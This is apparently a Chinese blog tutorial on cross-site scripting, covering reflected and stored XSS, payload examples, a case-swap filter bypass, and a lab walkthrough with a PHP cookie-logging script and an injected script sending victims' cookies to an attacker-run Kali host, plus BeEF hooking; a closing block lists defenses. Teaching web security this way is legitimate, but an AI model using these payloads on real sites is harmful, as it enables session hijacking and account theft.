xss跨站脚本攻击(cross site script),了解xss的危害,利用靶场让我们明白xss的危害之大

xss介绍

xss跨脚本攻击,跨站脚本(cross site script),为了避免与样式css混淆,简称xss,xss是一种经常出现在web应用中的计算机安全漏洞,也是web中最常见的攻击方式。
什么是xss呢?xss是指恶意攻击者利用网站没有对用户提交数据进行转义处理,或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。和CSRF一样,都是用来对客户端进行攻击的。

xss攻击危害

1、盗取各类用户账号,如机器登录站好,用户网银账号,各类管理员账号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商用价值的资料
4、非法转账
5、强制发送电子邮件
6、网站挂马
7、控制受害者及其向其他网站发起攻击

常见xss类型

常见的几种xss类型:反射型,存储型,DOM型

反射型(reflected)

利用类似检索框存在的xss漏洞,却不能存储xss脚本,只能有道用户去点自己插入了xss脚本的链接,然后进行操作,类似我们的钓鱼网站。
在这里插入图片描述

存储型(stored)

利用类似于留言板的地方,可以把你输入的语句保存起来的网站,如果这种网站存在xss漏洞,能够进行跨站脚本攻击,把脚本存储进服务器的网站后台,用户进入这个网站就会触发这个脚本,这个脚本如果是写成把本机cookie发送给攻击者,攻击者拿到cookie,利用cookie登录账号进行对账号的操作
在这里插入图片描述
上面是一个存储型的xss,已经注入了一个脚本进去,只要别人进入这个页面他就会执行这个脚本。
在这里插入图片描述

.
.

脚本的构建

构建xss脚本,会用到html,js

常用函数
在这里插入图片描述

弹窗警告

<script>alert(‘xss’)</script>

这个脚本实现弹窗提示,一般作为漏洞测试或者演示使用,这个js脚本实现弹窗提示,一般作为漏洞测试或者演示使用,一旦此脚本能执行,也就意味着后台服务器没有对特殊字符做过滤<>/’,证明这个页面存在xss漏洞

<script>alert(document.cookie)</script>
弹窗内容为自己的cookie
<iframe src=http://www.baidu.com width=300 height=300></iframe>
页面嵌套
<script>window.location=”http.baidu.com”</script>
页面重定向

接下来演示一下xss的应用

弹窗警告并重定向
<script>alert("这个页面已失效,请移步到我们的新站");location.href="http://www.baidu.com"</script>
这里就是结合了一些社工思路,通过网站内部私信的方式发给其他用户。
如果其他用户点击并且相信了这个信息,则可能再另外的站点重新登录账户(克隆网站收集账户)
访问恶意代码
<script src='http://www.baidu.com/xss.js'></script>
结合BeEF收集用户的cookie
巧用图片标签
<img src="www.baidu.com" onerror=alert("xss")>
<img src="javascript:alert('xss');">
<img src="http://BeFF_IP:3000/hook.js"><img>

网站存在过滤需要随机应变来编写能够绕开过滤的脚本

绕过大小写<ScrIpt>alert('xss')<SCRipt>
字符编码可以采用URL,Base64等编码

在这里插入图片描述
在这里插入图片描述
在存储型的xss注入中,注入成功后这个脚本将会保存到网站后台中,每当有用户成功访问这个网页,都会自动执行这个脚本,留言板就是一个典型的存储型,在这里输入成功的语句都会被保存在后台数据库中
在这里插入图片描述
这就是一个留言板注入进的xss脚本,一个js的弹窗警告,注入成功后被系统认为是代码,执行了这个代码使得页面进行弹窗
在这里插入图片描述
攻击运用 :获取cookie;渗透机kali linux端操作
1.构建收集cookie服务器
2.构造xss代码并植入到web服务器
3.等待肉鸡触发xss代码并将cookie发送到kali
4.cookie利用

接下来利用xss来进行一次实操,利用到PHP脚本,BeEF工具(这个更方便)

1构建收集cookie服务器
这里我们用kali作为这个服务器
2构建收集xss代码并植入到web服务器

root@kali:~# vim /var/www/html/cookie_rec.php
<?php
	$cookie = $_GET['cookie'];
	$log = fopen("cookie.txt","a");
	fwrite($log, $cookie . "\n")
	fclose($log);
	?>
这是一个简单的收集cookie的php脚本

在这里插入图片描述
赋予这个目录权限
通过渗透机植入xss代码:

<script>window.open('http://1.1.1.1/cookie_rec.php?cookie='+document.cookie)</script>
1.1.1.1是kali机的ip,也是/var/www/html这个目录

在这里插入图片描述
3.等待肉鸡触发xss代码并将cookie发送到kali
注入成功就等待目标进入这个网页触发这个脚本,然后他的cookie就被保存到了/var/www/目录下面的cookie.txt文本中
4.cookie利用
cookie拿下后可以进行别的一些操作,可以利用到BeEF来控制目标浏览器

这里附上一篇使用BeEF的文章,也是我的嘿嘿
BeEF工具介绍

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS(Cross-site scripting)跨站脚本攻击是一种常见的Web安全漏洞,它允许攻击者在受害者的浏览器注入恶意脚本,从而窃取用户的敏感信息,或者执行其他的恶意行为。 危害: 1. 盗取用户的Cookie和Session等敏感信息,以便进行身份欺骗。 2. 窃取用户的个人信息,如用户名和密码等。 3. 在受害者的浏览器执行恶意脚本,从而攻击其他网或者发起DDoS攻击。 4. 篡改网的内容,使用户产生误解或者损失。 攻击原理: 攻击者通过注入恶意脚本利用的漏洞,从而在受害者的浏览器执行恶意脚本。攻击者可以通过以下方式进行攻击: 1. 通过URL注入:攻击者在URL注入恶意脚本,当用户访问该URL时,脚本就会在用户的浏览器执行。 2. 通过表单注入:攻击者在表单注入恶意脚本,当用户提交表单时,脚本就会在用户的浏览器执行。 3. 通过Cookie注入:攻击者在Cookie注入恶意脚本,当用户访问网时,脚本就会在用户的浏览器执行。 4. 通过DOM注入:攻击者在网页的DOM节点注入恶意脚本,当用户浏览网页时,脚本就会在用户的浏览器执行。 常用工具: 1. XSSer:一款功能强大的XSS渗透测试工具,可以自动化执行XSS攻击。 2. BeEF:一款浏览器漏洞框架,可以将浏览器作为攻击的一部分,实现XSS攻击和其他浏览器相关的攻击。 3. XSStrike:一款自动化的XSS测试工具,可以识别漏洞并生成有效的攻击载荷。 防御策略: 1. 输入过滤:对用户输入的数据进行过滤,使其不包含特殊字符和脚本代码。 2. 输出转义:对输出到页面的内容进行转义,将特殊字符转换为HTML实体,从而防止恶意脚本注入。 3. 使用CSP:通过限制网可以加载的资源,如脚本、样式表和图片等,来防止XSS攻击。 4. 使用HTTP-only Cookie:将Cookie标记为HTTP-only,使其只能通过HTTP协议传输,从而防止通过JavaScript访问Cookie。 5. 随机化Cookie:在Cookie添加一些随机的信息,使攻击者无法猜测和伪造Cookie。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值